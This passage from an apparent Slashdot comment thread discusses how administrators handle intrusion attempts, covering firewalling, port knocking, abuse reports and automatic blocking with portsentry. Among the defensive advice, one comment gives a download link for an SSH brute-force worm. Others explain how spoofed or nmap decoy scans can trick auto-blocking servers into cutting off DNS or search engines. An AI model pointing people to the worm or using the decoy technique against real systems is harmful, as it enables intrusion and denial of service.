      Each host only requested once every 4 minutes (like clockwork). Filtering based on high activity would have not been feasible since my regular users generate a lot more hits per user than this. The problem was that there were ~25,000 zombies in the attack, generating a total of over 6000 hits a minute. I'm certain there's a way to write a module for apache to filter out based on the error I noticed in the request headers, but it was easier to put "if (detect_request_errors()) exit();" at the top of my common.php file. I'm not specifically saying what the error in the request was in case my attacker (who I never figured out, I still have no idea why I was even attacked) reads this comment, I don't want them going, "Aah, that's how he foiled me" hehe.

    10. Re:This is more fun! by nizo · · Score: 1

      If the zombies were requesting a specific URL, you could always move the offending script to some other URL (changing any links in other places on your site) and just put up a static page, or even an empty page.

    11. Re:This is more fun! by Anonymous Coward · · Score: 0

      I posted the Geocities "Sorry, this site is temporarily unavailable! The web site you are trying to access has exceeded its allocated data transfer. Visit our help area for more information." on our website also. Attacks were down 75% but pinkslips were up 100%.

    12. Re:This is more fun! by Anonymous Coward · · Score: 0

      hoarde? What is that, some cross between horde (large groupe of nasties) and hoard(cache of stuff)?
      Use a dictionary, please...

    13. Re:This is more fun! by Dr.+Manhattan · · Score: 1
      ...investigate port knocking if you can do that.

      Port knocking does provide a certain amount of security, but the more you try to make it secure against sniffing/replay attacks, the less reliable it becomes. Most of these systems are critically dependent on UDP packets being delivered, and delivered in the order they were sent. Neither of these is guaranteed on today's Internet. A lot of routers are programmed to just dump UDP packets on the floor if they are at all busy.

      I wrote something that can be used to shield SSH and other services, but is fundamentally unhackable from the outside and is reliable because it uses TCP instead of UDP.

      --
      PHEM - party like it's 1997-2003!
    14. Re:This is more fun! by bugnuts · · Score: 1

      Competing game, perhaps? Or maybe someone you banned for trying to cheat or something?

    15. Re:This is more fun! by nahdude812 · · Score: 1

      As I understood it (I don't use port knocking), it's the practice of setting up your firewall to log connection attempts on certain ports. Nothing actually listens on this port though. You define a sequence of port numbers to which a failed connection must be attempted (TCP), and that done, connect to your secure service. The secure service verifies that the logs show your IP running the correct sequence of failed connections, and if so, allows you to connect. I didn't think it relied on UDP at all.

    16. Re:This is more fun! by nahdude812 · · Score: 1

      It's possible, though at the time the game was still fairly new, and there was only one ban in place, the subject of the ban decidedly did *not* have the technical knowhow to accomplish something like this.

    17. Re:This is more fun! by slamb · · Score: 1
      In my opinon, Tom Hudson's way of dealing with these critters, is far more entertaining, than just ignoring them.

      Of course, don't view the results of that script on any server you have login cookies on. Known attackers can trivially insert arbitrary HTML into the logs. Cross-site scripting vulnerability.

    18. Re:This is more fun! by Anonymous Coward · · Score: 0

      My favorite part about his script is that it includes a cross site scripting vuln, that an attacker can use to have users send their session cookie for any site that deploys it...gotta do some output filtering on that user agent genius.

    19. Re:This is more fun! by planckscale · · Score: 1
      Use the software at www.dshield.org which will run queries against your router's logs (you can use lynksys, d-link, etc). Also, the software will email you of the attempt if you like, and it automatically submits port scanner's to it's database. You can look to see which subnets, and IP's have been scanning also.

      --
      Namaste
    20. Re:This is more fun! by nahdude812 · · Score: 1

      Unfortunately other sites depended on this link being where it was. It was part of my "logdnet" (where I maintain a list of servers that run my game). Moving this would have broken this functionality for most or all of these sites.

    21. Re:This is more fun! by Dr.+Manhattan · · Score: 1
      As I understood it (I don't use port knocking), it's the practice of setting up your firewall to log connection attempts on certain ports... I didn't think it relied on UDP at all.

      In practice, they use UDP so they don't have to wait for TCP timeouts on the client side. Some rely on sticking some kind of data in the payload of the packet, but it's hard to do that in a way that's resistant to replay attacks. If you use the current time as a salt, you either need precisely aligned clocks, or you need a 'window', which increases CPU usage and decreases security.

      --
      PHEM - party like it's 1997-2003!
    22. Re:This is more fun! by Anonymous Coward · · Score: 0

      Well, if the page the zombies load isn't the "main page", you can do something like set a cookie from the main page that is used to verify that the resource intensive page should load, else it just loggs the IP or something.

      Although, if the IP's are the same, could you not just ban them?

    23. Re:This is more fun! by nahdude812 · · Score: 1

      As I mentioned earlier, there ended up being almost a million IP's, which rotated around a lot, day to day there were very few common IP's.

      Yes, I could have used cookies to track the legitimate users, but this would have blocked the remote sites that used this page since they relied on PHP's file wrappers to interact with it, which do not support cookies. I was able to detect them with an error in the request headers as mentioned elsewhere, and exit() immediately. Once I had a chance to analyze the attack, I was able to mitigate it pretty easily, but 9 million bogus hits a day still consumes a fair amount of bandwidth and server resources, even as efficiently as I was able to block them.

  80. try security by obscurity by keexy2k · · Score: 1

    use different port numbers for your services for the outside interfaces (the ones to the net, e.g. ppp0).
    like:
    ssh -> 49022
    http -> 49080
    try to avoid ftp, but if you must then also +49000 (or any other number above 1024)

    this way it'll seem like you have no (typical) ports open and therefore you'll only receive syn packets which will keep the traffic low and the "danger" minimal.

  81. Traceroute -vs- whois by Alioth · · Score: 1

    Why use traceroute (unless you're trying to find the ISP's upstream provider - or one of the ISP's upstream providers) - surely it'd be better to do a whois on the IP address, which often gives you an abuse address to try? Surely, if you're talking of root, you're a unix guy so should be using the command 'traceroute' - not the MICROS~1 MS-DOS-style named 'tracert'?

    Well, smart-aleckness aside, I used to report every little intrusion, but there's so many I just can't be bothered.

    These days, a better strategy is having the first line in pf.conf (or your OS's equivalent) that reads:

    block in on all

    Then just allow specific traffic. The secure default is blocked. Only allow remote logins from places they should come from (although in some instances, you need SSH available from everywhere so you can get to it when roaming).

  82. Theres a worm going around.. by Bert64 · · Score: 1

    There is a worm floating around that tries to ssh in as root, guest, test and some other accounts.. Quite harmless unless you have these accounts unpassworded or with identical usernames/passwords.
    As for the one/week or other such things, it's possible this is just someone who mistyped the ip.

    --
    http://spamdecoy.net - free throwaway anonymous email - avoid spam!
    1. Re:Theres a worm going around.. by TheSync · · Score: 1

      Which worm is this?

    2. Re:Theres a worm going around.. by Bert64 · · Score: 1

      One for linux, available from:
      http://frauder.us/linux/ssh.tgz
      It's a pretty stupid worm, doesnt exploit anything.. just looks for predefined usernames and passwords like guest/guest test/test etc

      --
      http://spamdecoy.net - free throwaway anonymous email - avoid spam!
  83. ISP point of view by rnd0110 · · Score: 1

    We receive a lot of intrusion reports but usually they are due to some worm activity from our users. We notify (if possible) a user but almost always do nothing else.
    However, usually it works.

    Nowadays people are accustomed to letters claiming they have a virus so probably some of them do not read
    such letters any more.

    We do not close outgoing port 25 either.

  84. Re:Somewhat offtopic, but how do people deal with by Inda · · Score: 2, Funny

    Post the name and address here as AC.

    --
    This post contains benzene, nitrosamines, formaldehyde and hydrogen cyanide.
  85. what to do about this: by halsathome · · Score: 1

    Join DShield and keep a good general set of firewall rules, e.g. blocking SSH from any but a few select adresses or netblocks. DSHield will send out emails to ISP's with condensed reports on the worst offenders. That system has been labouring a bit recently, so consider a donation while you are at it.

  86. Less is better by Anonymous Coward · · Score: 0

    Well, I'd say you need to use a firewall to restrict all communication ports and then allow at least port 80 (if it's a www server). Then, ask yourself do you really need SSH? Well, if you do, select protocol v2 and use complex passwds. Also, disallow root access on ssh logons, use some normal user account first and then 'su -' to root.

    When configuring IPTables or other software firewall, use a DROP policy rather than DENY. DENY sends RST packets while DROP doesn't answer to received packets at all. This will reduce the amount of knock-knock-who's-there-type activity since the machine just doesn't seem to be there (except ports 22 and 80). No reply, no further knock-knocks, simple.

    Then ofcourse, keep the server software always up to date. I think that should do it.

    1. Re:Less is better by pandrijeczko · · Score: 1
      Also, disallow root access on ssh logons, use some normal user account first and then 'su -' to root

      You can actually go a stage further and put the AllowUsers directive in /etc/sshd_config. Just stick in the list of users that can use ssh, leave out root and the common account names (you can always su once you're in as a normal user anyway) so that an intruder would need to know the account name of an allowed user before getting anywhere.

      It just gives you an extra layer of security which is always a good idea to do if you can.

      --
      Gentoo Linux - another day, another USE flag.
  87. Dealing with this myself currently by pandrijeczko · · Score: 1
    As it happens, I'm just looking at some attempted intrusions on my own server on which I run ssh & sftp for a few buddies to use.

    In the past week or so, I've seen a couple of failed access attempts from an IP address at one of the universities in China and from one on comcast.net (surprise surprise) - whoever it is has tried a couple of "standard" account names that I (of course) don't have on my server so the logs have just reported the failed attempts.

    It would be tempting to send an "abuse@" email to someone but the fact is that the script kiddie is probably using those IPs as compromised boxes anyway.

    So all I'm doing now is putting a shell-script in place that emails me when the logs pick up any more illegal access attempts and just adding the IPs I have to a barred list on my firewall that just drops the packets from those IPs for an extra layer of security. The added advantage is that this is a "passive warning" to the cracker - instead of getting any form of login prompt, (s)he'll just get nothing back in future.

    This change in behaviour from my server should alert the cracker that I am aware of their presence and maybe act as a deterrent in itself.

    Unless there is actually a successful intrusion, I think this is the best way to proceed - just monitor the logs and put an extra layer of security in place when you see anything unusual.

    Just keep outsmarting them...

    --
    Gentoo Linux - another day, another USE flag.
    1. Re:Dealing with this myself currently by Anonymous Coward · · Score: 0

      The added advantage is that this is a "passive warning" to the cracker

      As a white male, I resent this offensive, and racist post.

  88. More good advice ... by zonix · · Score: 2, Informative

    This is really good advice, but you can do more. :-)

    Most ISPs really appreciate the complete header of the mail, and sometimes even the body in case of spam. First of all it adds to the authenticity, and second they'll be able to forward your complaint to the responsible ISPs if you had too much beer while reading a spoofed header (more so for spam than virus mails). Some ISPs are quite helpful in this regard.

    To aid in identifying the correct abuse addresses I can recommend the hinfo utility as a complement to whois. Oh and if you're stuck with a standard whois, consider replacing it with the one made by Marco d'Itri - it's the default in Debian, and has the ability to guess the correct whois hosts to ask.

    z
    --
    What would an EWOULDBLOCK block, if an EWOULDBLOCK could block would? -- me
    1. Re:More good advice ... by arcade · · Score: 1

      This is really good advice, but you can do more. :-)

      Well, one can always do more. :-)

      Most ISPs really appreciate the complete header of the mail, and sometimes even the body in case of spam.

      In the case of spam - indeed. In the case of viruses, there is really no need, especially not after gaining the ISPs trust by sending chunk after chunk of correct virus reports. The only part they actually need is the 'Received: from' line, and the name of the virus. It's not like they're going to close the poor bastards account or anything - just call him and give him a heads up about "Eyh mate, we're receiving reports that your computer is sending virus to others.. you should get yourself a virus scanner.. we can recommend the following ones" .. .. and if he doesn't do anything about it - and they get more complaints, they'll just shut his account UNTIL he can confirm, by phone that "uh, yeah, sorry about that, I had a virus.. it's removed know.. honestly!"

      First of all it adds to the authenticity, and second they'll be able to forward your complaint to the responsible ISPs if you had too much beer while reading a spoofed header (more so for spam than virus mails).

      Well, if it's spam you should of course add the entire mail - as we're talking about permanently remove the suckers account then. In the case of viruses it's another cup of tea - at least in my experience.

      And, well, there isn't too much to be spoofable. I check who sent the email to the mailserver I admin, and then just ship of a report to the ISP that admins that IP space. :) Most viruses doesn't seek out open relays to mail themselves from, and if they do - the ISP will know since I include the name of the virus (thus they know whether they've got a user with a virus, or a user with an open relay).

      If I've sent the email to the wrong ISP, I prefer being hit with a cluebat, instead of them having to relay the message for me. ;)

      To aid in identifying the correct abuse addresses I can recommend the hinfo utility as a complement to whois.

      Hm, what does that tool do? What databases does it look up? Just the "hinfo" part of DNS?

      Oh and if you're stuck with a standard whois, consider replacing it with the one made by Marco d'Itri - it's the default in Debian, and has the ability to guess the correct whois hosts to ask.

      I tend to use the stock one that comes with suse. According to --version, its written by some "md plus whois at linux dot it" (obfuscated on purpose) -- which seems to match the name your mentioning. :)

      Anyways, thanks for a nice reply :)

      --
      "Rune Kristian Viken" - http://www.nwo.no - arca
    2. Re:More good advice ... by zonix · · Score: 1

      It's not like they're going to close the poor bastards account or anything

      Well, in case of some ISPs in my country (Denmark) the account is frozen if they can't get hold of the customer. The customer will just have to call back. Pretty effecient. :-)

      And, well, there isn't too much to be spoofable. I check who sent the email to the mailserver I admin, and then just ship of a report to the ISP that admins that IP space. :) Most viruses doesn't seek out open relays to mail themselves from, and if they do - the ISP will know since I include the name of the virus (thus they know whether they've got a user with a virus, or a user with an open relay).

      With regards to spam, sometimes the header has one or several spoofed "Received:" lines with both fake IPs and hostnames. Sometimes it's a bit tricky to locate the real originating IP.

      If I've sent the email to the wrong ISP, I prefer being hit with a cluebat, instead of them having to relay the message for me. ;)

      Certainly! But I did say "after having to much beer". It happened to me once, ok! ;-)

      Hm, what does that tool do? What databases does it look up? Just the "hinfo" part of DNS?

      From the hinfo page at packages.debian.org: "Hinfo will check (possibly obscured) address/hostname/website ownership and will display which blacklists (such as sbl.spamhaus.org and bl.spamcop.net) the site is listed on. It is primarily used in manual spam reporting."

      It's by no means authoritative, but generates useful info such as matching entries from abuse.net's contact list. I just feed it the IP in question.

      I tend to use the stock one that comes with suse. According to --version, its written by some "md plus whois at linux dot it" (obfuscated on purpose) -- which seems to match the name your mentioning. :)

      That's the one! Don't forget to send him netblocks that it doesn't handle correctly (mostly Korean and Brazilian).

      Anyways, thanks for a nice reply :)

      No problem! You too. :-)

      z
      --
      What would an EWOULDBLOCK block, if an EWOULDBLOCK could block would? -- me
  89. Re:Somewhat offtopic, but how do people deal with by Anonymous Coward · · Score: 0

    Actually, I'd have modded that as funny, myself. And I've got karma to burn. Some people just don't have a sense of humor.

  90. there is your problem by SQLz · · Score: 1
    Recently, the number of attempted intrusions has jumped from about one every week to several per day - and these are only the really obvious attempts, like idiots who try to log in as root from the outside.

    When this happens, the only thing you should be seeing is a firewall log stating someone was denied access to port 22, so they don't event get to attempt to login. I can't believe this guy keeps SSH wide open.

  91. Uhhhh by Rysc · · Score: 1

    tracert? Obviously you use Windows too much to be worth helping here on Slashdot.

    --
    I want my Cowboyneal
  92. Only now you get several a day by Anonymous Coward · · Score: 0

    If you're only just starting to see several attempts a day, and your server's connection is from a commercial service provider's block of IP addresses, I suspect you may be missing a whack load of probes. My experience is that a couple of days after you put the box up you should see a half dozen probes a day, but as everyone says, they're just some robots scanning IP blocks. Unless your box reports back something interesting, no-one dangerous will come knocking. In the meantime, take a look at your backup practises.

  93. Should do, could do by Oestergaard · · Score: 1

    You may have a local CERT office to which you can report these incidents. I guess that's what you "should" do.

    However, in my experience that's a complete waste of time. CERT (both national and international) have proven themselves to me to be a bunch of flaming morons and pacifist hippies, either ignorant or afraid of their own shadows - well, maybe unless you're Raytheon or someone else who has friends that fund CERT...

    What you can do, however, is to set up firewalling. Make it annoying - use "drop" rules instead of "reject" - so that SSH connections like you are seeing, made from "unwanted" IP addresses will simply hang for a small eternity before they time out, rather than giving the k!dd13 a login prompt right away.

    Filtering out ICMP ECHO REQUEST message might be a good idea - nmap with default options will not portscan a machine if it can't ping it - so while this of course doesn't buy you any security in any way what so ever, it may lessen the number of attempted intrusions. First firewalling advise still stands though; set up rules to waste as much as as possible of the wannabe intruder.

    Last but not least - make damn sure your systems are secure. (this implies; running a GNU/Linux distribution you can reliably keep up to date, or running some other OS you can reliably keep up to date)

  94. Ignoring it == making the problem worse by SgtChaireBourne · · Score: 4, Interesting
    The network administrator at one site I was at reduced the number of intrusions by more than 1/3 over a 2 month periond and kept it down the whold time she kept the job.

    How? When she found out about attacks and attempted intrusions, she got on the phone with the netblock owner and gave them an earful and followed up until something happened, even if it was only a small improvement. If need be, she reported it to the police and was even able to convince them that crime was an area of their responsibility even if they did not currently have the expertise.

    The attacks dropped off rapidly after a few weeks. And since shed kept notes about who she talked with, when and about what, there was very little runaround. When she started that, it took about 45 minutes per day, but by the end it was down to around 15 on average.

    --
    Beta is broken and the link to classic doesn't work. Stop wasting our time or there won't be anybody left here.
    1. Re:Ignoring it == making the problem worse by Anonymous Coward · · Score: 5, Funny

      I swear, just like a women to take a technical problem and solving it by nagging someone's ear off

    2. Re:Ignoring it == making the problem worse by Anonymous Coward · · Score: 0, Flamebait

      I swear, just like a women to take a technical problem and solving it instead of BS-ing about it endlessly,

  95. Secure, log, complain by Eggplant62 · · Score: 1

    Secure your systems and ensure they're running the latest copy of everything, avoid using old software that is likely to have security holes that are well-known.

    Log as much detail as you can to tell when an attack happens and where it's coming from. Without that kind of info, you'll not know what's going on with your systems.

    Abuse reports on especially egregious behavior should be filed. We want to discourage this kind of behavior, so the only thing to do is to check your logs regularly for anything that appears *not right*. If you find a large block of attempts from one source, extract those log entries and include them in a *polite* letter to abuse@[originating ISP].

    Then firewall off the source, not just the single IP source but the /24 surrounding it, is my own motto. If one asshole can abuse you, and being that most abusive assholes live on DSL/cable with DHCP and can be in any address within a certain block, block enough space to cover any possible ingress. Then and *only then* can you rest easy.

  96. Two things by Xner · · Score: 5, Informative

    1) Tripwire is a file integrity checker. I suppose you mean portsentry or similar. 2) Automatic firewalling a VERY bad idea. Remember that most modern scanning techniques do not require a full TCP connection, and are therefore eminently spoofable. Not imagine someone spoofing a syn scan from the IPs of google.com. BOOM! No more google for you, you just firewalled it off yourself. BOOM! No more slashdot. BOOM! No more quake server. You get the idea.

    --
    Pathman, Free (as in GPL) 3D Pac Man
    1. Re:Two things by 3rd_Floo · · Score: 2, Interesting

      Even better one would be for an intruder to take note of which DNS server your connecting to, then BOOM, quick spoofed scan and you cant get DNS. While your DNS is out and you are trying to get your connectiong working they slip inline on you and 'pretend' to be your DNS, now they can poison you really easily... of course, muggiling with the routing tables of a up stream switch and whatnot to pass themselves off as a DNS server, or hijacking the upstream DNS isnt always the easiest, but it would be a dirty way to slip into a large corp's systems if the security was set like such...

    2. Re:Two things by ckaminski · · Score: 2, Insightful

      I'm sorry, but how is adding an incoming port block on a firewall going to prevent using google? Serving up a quake server, maybe, but outgoing surfing and the like sure isn't going to stop him.

      And if it's IP based, there's a whole lotta IP addresses in the world... methinks he'll run out of kernel memory long before he's finished blocking them all.

    3. Re:Two things by LeaInShadow · · Score: 1

      >--snip----snip-- They aren't talking about blocking one port on detection, they are talking about looking at thoes ports then blocking off the ip address of the the detected intrusion. The problem comes when the intuder uses a common site as a spoof address on an attack/scan. The setup described would lock it out.

      --
      Support proper distortion through signal bounce!
    4. Re:Two things by Xner · · Score: 2, Interesting
      Who said anything about blocking a local port? If it's port SCANNING every port will be touched once or twice, and blocking local ports as they are touched is not going to have any meaningful effect. What the OP is talking about is adding a firewall route to ignore whatever comes from the address that is doing the scanning as soon as you detect it, ie. in the case of a "fast" scan, 3 or 4 ports into the thing.

      Your "there's a whole lotta IPs in the world" comment is seriously asinine as well. As I mentioned, it is trivial to spoof portscans, and while there may be a whole lotta IPs in the world, once you have accidentally firewalled off the ones belogning to your DNS or your mail server, you are going to have some serious networking issues. Running out of "kernel memory" (whatever that might be) is the last of his worries.
      Automated security response is a tricky business, and if you do not carefully consider all implication, you are goign to be worse off than you were, not better.

      Don't take my word for it. Set up your PC this way and see how long it takes before someone uses it against you.

      --
      Pathman, Free (as in GPL) 3D Pac Man
    5. Re:Two things by BlackHawk-666 · · Score: 1

      I ran this setup for well over a year and nobody ever did anything like this to me. I blocked IPs, not IP and port combo, and averaged 20 blocks a day. The firewall laughed it off. The blocks were against incoming traffic, and I wasn't running a DNS that the outside world should access. As stated, I didn't mind locking off access to my server to various spoofed IPs since it was just for a few weeks at a time, not really an issue for a home user.

      --
      All those moments will be lost in time, like tears in rain.
    6. Re:Two things by BlackHawk-666 · · Score: 2, Interesting

      You're right, it was portsentry. I also ran tripwire to check the integrity, but it was a while ago so my memories were fuzzy. You're wrong about the no more Slashdot and Google, the connections being firewalled were incoming, not outgoing.

      --
      All those moments will be lost in time, like tears in rain.
    7. Re:Two things by x0n · · Score: 2, Insightful

      While modern scanning techniques do not require a full TCP connection, this does not have anything to do with spoofing. If you were to perform a SYN scan with a spoofed IP, it is no longer a scan, but a standard syn-flood DOS (denial of service) attempt. You cannot directly learn open ports (e.g. portscan) while using spoofed a IP.

      But in effect what you say could happen, but it wouldn't be a portscan, but rather a malicious DOS attempt.

      - Ois

      --

      PGP KeyId: 0x08D63965
    8. Re:Two things by macdaddy · · Score: 1

      I've been running PortSentry since it first came out. What's the been, 5 years now? I've never had any problems. Any compotent sysadm shouldn't. I could see how our's would have problems if they didn't know what to whitelist.

    9. Re:Two things by Xner · · Score: 2, Insightful
      Do i have to spell everything out for you guys? Here's how it works:

      1) Bad dude does SYN scan.
      2) Bad dude gets firewalled off.
      3) Bad dude performs another scan with a spoofed IP (conveniently provided as an option by the popular nmap)
      4) Good dude is in trouble

      Just say no to automatic firewalling.

      --
      Pathman, Free (as in GPL) 3D Pac Man
    10. Re:Two things by Xner · · Score: 1
      What is "incoming traffic" to you?

      Any packet coming your way? That would include the page google is trying to send to you.
      Any packet coming your way with SYN set and ACK cleared? This does not drop anything useful (unless you are a server, which most of us are up to some degree), but it leaves you wide open to tons of other semi-stealth scanning techniques and DoSs.

      Frankly, I would not bother. There are too many potential pitfalls for too little benefit. Just make sure you run few and well-patched services visible to the outside and don't worry about the scanners.

      --
      Pathman, Free (as in GPL) 3D Pac Man
    11. Re:Two things by Badanov · · Score: 1
      I'm sorry, but how is adding an incoming port block on a firewall going to prevent using google? Serving up a quake server, maybe, but outgoing surfing and the like sure isn't going to stop him.

      Thank you. The statement that if you block an inbound attempt from Google sounded silly, but being new to ipfw, I wasn't quite sure.

      Why couldn't he just allow ssh and http inbound, block everything else, allow only dns, mail services (assuming he is running a mail server), then allow ftp, http, https and ssh outbound, lock down everything else?

      Whomever is trying to break in will curse his name forever.

      --
      Dawn of the Dead
    12. Re:Two things by spuke4000 · · Score: 1
      > BOOM! No more slashdot.

      Sweet, I'll finally be able to get some work done.

      --
      This post cannot be rebroadcast without the express written constent of Major League Baseball.
    13. Re:Two things by Anonymous Coward · · Score: 0

      You're a dumbass, so many people have commented and you still don't get it. This OP describes a handy way to do a little automatic clampdown for a home system. Sure there are pitfalls but you exagerate them just as much as you claim others don't see them. Open your mind a bit.

    14. Re:Two things by ckaminski · · Score: 1

      Are you serious? You let spoofed packets into your network from "out there"? Dude, spoofed packets have had solutions for years. I suggest you do a little reading and learn a little about firewalling.

    15. Re:Two things by ckaminski · · Score: 1

      The only way that an inbound google would get rejected (when requested via outbound client query) would be if you weren't running a stateful firewall, but a dumbass packet filter. Since ipfw/iptables is stateful, the problem doesn't occur.

    16. Re:Two things by br0ck · · Score: 1

      3. Bad buy spoofs Google
      4. Oh no! Google cannot make an unrequested incoming connection to me
      5. Oh wait, hooray, I can still browse Google because my outbound connection tells the firewall to allow the resulting incoming data as long as it traffic responding to my specific outbound request.

    17. Re:Two things by justMichael · · Score: 3, Interesting
      I'm sorry, but how is adding an incoming port block on a firewall going to prevent using google? Serving up a quake server, maybe, but outgoing surfing and the like sure isn't going to stop him.
      Blocking googls IPs isn't going to keep you from searching, but it will keep google off your site.

      Example: A competitor that just happens to rank higher than you automatically drops packets from any IP that trys an invalid login.

      You go through your logs and generate a list of all google's bots and then launch an "attack" against your competitor spoofing those IPs. You just stopped google from indexing their site. Move on to Yahoo and any other search engine you feel like.

      Granted somebody is going to be watching the logs and start to wonder why google hasn't visited in a while, but you get the point.
    18. Re:Two things by Anonymous Coward · · Score: 0
      Please do yourself a favor and lookup the difference between an incoming and an outgoing connection.

      Hint: It has to do with who ORIGINATES the connection!

      Blocking an incoming address only blocks connections ORIGINATING at that address. Not packets from that address on a connection that was originated inside the firewall. Sheesh!

      Now where's that "-1 CLUELESS" mod when you need it?

    19. Re:Two things by Xner · · Score: 1
      I don't think we are on the same page here, so just to clarify:

      1) Determining what is spoofed and what is not (without completing the 3way handshake) is not a solved problem unless you have full knowledge of the routing details. You just get a packet that with a certain return address on an interface which would otherwise also get the packets if they were from the legitimate source, and you are none the wiser. Anti-spoofing measures should be incorporated together with routing at all stages in order to be effective.
      The ultimate solution against spoofing is getting everyone to set up their egress filters properly, but people are only now starting to catch on to the fact that this is at least as important as setting up your ingress filters correctly.
      Of course, if i'm missing something blindingly obvious about determining what is a spoofed packet and what isn't (aside from the evil bit of course ;) feel free to point it out. "Dude you gotta read something" is a bit of a vague reference I'm sure you'll agree.

      2) I have no idea what I did to imply that i let any kind of packet from anywhere "into my network". I was assuming we were discussing deployment on a bastion host, that per definition is exposed to all network traffic.

      --
      Pathman, Free (as in GPL) 3D Pac Man
    20. Re:Two things by nzkbuk · · Score: 1

      The problem is most people running servers aren't compotent sysadmins. They are typically business people who lease a server. They get hit by something small then find something like portsentry. Install it, a bunch of time set the security to paranoid and then start wondering why their customers are complaining

    21. Re:Two things by BlackHawk-666 · · Score: 1

      That's pretty much where I'm at now, and why I don't worry about portsentry and auto-firewall rules anymore. The packets I was checking for were intended for a server, just ones I wasn't actually hosting on that machine e.g. SQL, hosted internally, but defintely not to the outside world. The reason people couldn't prevent me from accessing google is because that is an outgoing connection, and the data is returned on a TCP socket that you open to google. So, really not a lot to worry about as a home user, but not recommended for business.

      --
      All those moments will be lost in time, like tears in rain.
    22. Re:Two things by x0n · · Score: 1
      3) Bad dude performs another scan with a spoofed IP (conveniently provided as an option by the popular nmap)

      You are clearly not very network savvy at all. NMAP does not allow you to spoof your IP; The option...

      -S [your_IP]/-e [devicename] Specify source address or network interface
      ...does not allow you to specify an arbitrary IP for "spoofing" -- it is, as the syntax implies, a alternate way to choose which NIC to originate the scanning from, as each NIC has a different IP.

      - Oisin

      --

      PGP KeyId: 0x08D63965
    23. Re:Two things by Xner · · Score: 1
      I'm sorry, but you are starting to get on my nerves.

      If you wish further discussion with me, please keep in mind the old debate maxim, "soft to the man, hard to the matter".

      Also, you would do well to investigate the "decoy scanning" options, -D, before starting a tirade like that.

      -D: Causes a decoy scan to be performed which makes it appear to the remote host that the host(s) you specify as decoys are scanning the target network too.
      [...]
      Also note that some "port scan detectors" will firewall/deny routing to hosts that attempt port scans. The problem is that many scan types can be forged (as this option demonstrates). So attackers can cause such a machine to sever connectivity with important hosts such as its internet gateway, DNS TLD servers, sites like Windows Update, etc. Most such software offers whitelist capabilities, but you are unlikely to enumerate all of the critical machines. For this reason we never recommend tak- ing action against port scans that can be forged, including SYN scans, UDP scans, etc. The machine you block could just be a decoy.

      Since the entire argument is right there in the nmap documentation, if you do not take my word for it, take Fyodor's. I assume he is "network savvy" enough for you?

      I don't mind being corrected, but beware that arrogance and ignorance make a poor match.

      --
      Pathman, Free (as in GPL) 3D Pac Man
    24. Re:Two things by x0n · · Score: 1

      Ok, hands in the air. I sounded like a stuck-up idiot. I apologize, sincerely. You are correct of course.

      - Oisin

      --

      PGP KeyId: 0x08D63965
    25. Re:Two things by ckaminski · · Score: 1

      "Dude you gotta read something" is a bit of a vague reference I'm sure you'll agree.

      Yeah, that was a bit facetious of me. Spoofing ports themselves without the handshake is possible, I will concede and has indeed been used by many attacks in the past. IP spoofing, on the other hand, cannot proceed to this point with properly set up ingress rules. If someone tries to spoof my machines on my network via my widea-area adapter, I can prevent it on ingress. But you are 100% right that ISP's can do more to prevent this type of attack.

      As to your second point, other than a honeypot, there's no sense in leaving an unprotected bastion host, and with built in firewalls in Linux and no XP (perhaps other versions of windows to come), there's no reason not to firewall your machines against each other. That still doesn't protect against attacks made from your local machines to your database server, but if you're routing/firewalling rules are set up properly, you've got bigger problems if that's happening (comprised apache/iis servers perhaps).

      Regards
      -Chris

  97. Surely you jest by betelgeuse68 · · Score: 1

    Sending cease and desist orders?

    1) Assuming you can track them down
    2) Assuming they're somewhere they would care (I'm sure all these Russian kids are just trembling at the idea of a "cease and desist" order from a US court)
    3) Assuming the IP addresses you are even logging point to the source

    I got news for you mang, this ain't nothing new and there's not much you can do except to run a tight ship and prevent breakins.

    Welcome to the Internet,
    -M

  98. Google's Cache of above page. by Ch_Omega · · Score: 3, Interesting

    Seems like me posting that link, has resulted in it exceeding its allowed bandwidth. Here's the Google Cache.

  99. Let me guess by portwojc · · Score: 1

    Let me guess you're probably getting the following attempts on the accounts

    test, guest, admin, user, and root

    At least that's what I've been noticing over the last week on my boxes.

    Just someone scanning by looking for accounts to exploit by the looks.

  100. I agree! by Mold · · Score: 5, Interesting

    Back when I was 13 or so, one of my friends had convinced me that trying something like this would be fun. I was a bit reluctant, but I had some knowledge of Unix and networking, and it did sound like fun.

    We never actually got into anything, but the next day I got an e-mail from one of the companies we had attempted to break into, politely asking me to stop. It scared the shit out of me and I never attempted anything like that again.

    And to be honest, the fact that I'd been caught and asked to stop (nicely!) impressed me far more than any of the hackers out there.

    1. Re:I agree! by Anonymous Coward · · Score: 0

      Back when I was 13 or so, one of my friends had convinced me that trying something like this would be fun. I was a bit reluctant, but I had some knowledge of Unix and networking, and it did sound like fun.

      Oh how the world has changed... when I was a kid, we brought Mattel Electronic Football to school. Now kids bring ordnance.

      When I was 13, I had some knowledge of the Vic-20, and this guy knew a bit about Unix. Impressive!

      Anyway, I agree that depending on the circumstances, a nice firm "cut it the hell out, this is serious" from a company is likely to have the desired effect for most kids. I was there once too.. but we were much more low tech with our lame wardialers. ;)

    2. Re:I agree! by LaCosaNostradamus · · Score: 3, Interesting

      This essentially sums up my shoplifting experience as a young teen. I was warned that I was seen taking an item, and that I should go back and "find" it and return it. I went to the back of the store, pulled the gum out of my pocket, and returned it to the shelf. No police, no threats ... but a firm reminder that I was as "caught" as they wanted me to be. The scare factor worked, and I never shoplifted again. Kids are kids, and the entire thing seemed wisely handled.

      --
      [You have a stable society when some nut guns down a schoolyard and the law doesn't change.]
    3. Re:I agree! by tylernt · · Score: 1

      [You have a stable society when some nut guns down a schoolyard and the law doesn't change.]

      But... gunning down kids in a schoolyard is already illegal. What makes you think a law need to be changed?

      -1 Offtopic

      --
      DRM 'manages access' in the same way that a prison 'manages freedom'
    4. Re:I agree! by Anonymous Coward · · Score: 0

      That is the point.

    5. Re:I agree! by Dread_ed · · Score: 1

      I got caught stealing a pack of gum from Target when I was a kid. It was the the first time and last time I ever tried to shoplift. My friends said it was soooo easy. I guess I am not that adept at avoiding the authorities.

      Anyways, a uniformed security guard stopped me on the way out and asked my mother and I to follow him. He led me to a back room and explained to me that they had seen what I had taken and things would go better if I would just hand it over. I pulled the package of purple bubblegum out of my pocket and he proceeded to lay it out on the table and take polaroids of the gum while I watched. The effect was guilt inducing on a level I have never felt before. It is kind of freaky to me that I can still see the package of gum clearly in my mind (this was 20+ years ago), the color, the fact that it had become kind of abbraded on the edges from being in my pocket, and that you could see the outline of the segments of the gum through the outer package.

